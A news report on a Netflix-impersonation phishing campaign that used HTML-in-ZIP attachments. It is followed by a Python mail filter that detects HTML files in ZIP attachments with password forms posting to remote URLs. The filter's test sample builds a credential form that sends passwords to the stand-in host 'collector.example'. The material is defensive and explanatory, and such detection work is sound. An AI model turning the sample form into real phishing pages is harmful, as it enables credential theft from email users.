Netflix customers are being warned not to disclose any personally identifiable information through links in emails and SMS messages that claim to come from the video streaming firm, as the links and the impersonation are fake and part of a fraudulent data harvesting campaign.
According to a report published by INKY, a firm offering a cloud-based email security service, hackers launched a phishing scheme impersonating Netflix between August 21 and August 27 and started collecting sensitive details from customers.
The campaign delivered a malicious HTML attachment to targets, passed off as a ZIP file, and the social engineering attack was crafted so convincingly that victims were easily persuaded to hand over their details.
A prima facie investigation conducted by a forensic firm at the request of Netflix traced the origin of these emails to a Virtual Private Server operating in Germany, which then redirected the traffic to a Peruvian university.
NOTE 1: Last year, a similar form of attack was planned to dupe Amazon customers during the Thanksgiving and Christmas season. However, only a few online users fell prey to the campaign, so the loss was minimal.
NOTE 2: In a phishing attack, hackers try to convince online users with a fabricated web page that impersonates a big company, often a technology or service-providing firm. They send an email or SMS with a subject line about account blockage and ask the target to immediately click on the link and fill in sensitive details in order to resume the service that has been paused.
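For mail filtering, the delivery method described above (an HTML file carried inside a ZIP attachment) can be checked for mechanically. The following is an added example, not code from INKY or Netflix: it opens ZIP attachments and flags any HTML member whose form contains a password field and posts to a remote URL. The function names, the 2 MB size limit and the sample message are assumptions made for illustration.

```python
import io
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser

class FormFinder(HTMLParser):
    """Records form targets and whether a password field is present."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def scan_message(raw):
    """Flag HTML files inside ZIP attachments that post a password field to a remote URL."""
    findings = []
    msg = message_from_bytes(raw, policy=policy.default)
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        if not zipfile.is_zipfile(io.BytesIO(data)):
            continue
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if not info.filename.lower().endswith((".html", ".htm")) or info.file_size > 2_000_000:
                    continue  # not HTML, or too large to inspect safely
                finder = FormFinder()
                finder.feed(zf.read(info).decode("utf-8", "replace"))
                remote = [u for u in finder.actions if u.lower().startswith(("http://", "https://"))]
                if finder.has_password and remote:
                    findings.append((part.get_filename(), info.filename, remote))
    return findings

def build_sample():
    """Constructed sample message (not from the INKY report): ZIP holding a credential form."""
    html = ('<form action="https://collector.example/submit" method="post">'
            '<input type="password" name="pw"></form>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("account_update.html", html)
    msg = EmailMessage()
    msg["From"], msg["To"], msg["Subject"] = "billing@streaming.example", "user@example.org", "Account on hold"
    msg.set_content("Please open the attached form.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="update.zip")
    return msg.as_bytes()
```

Password-protected archives raise an error when their members are read, so a production filter should catch that case and treat the attachment as uninspectable rather than clean.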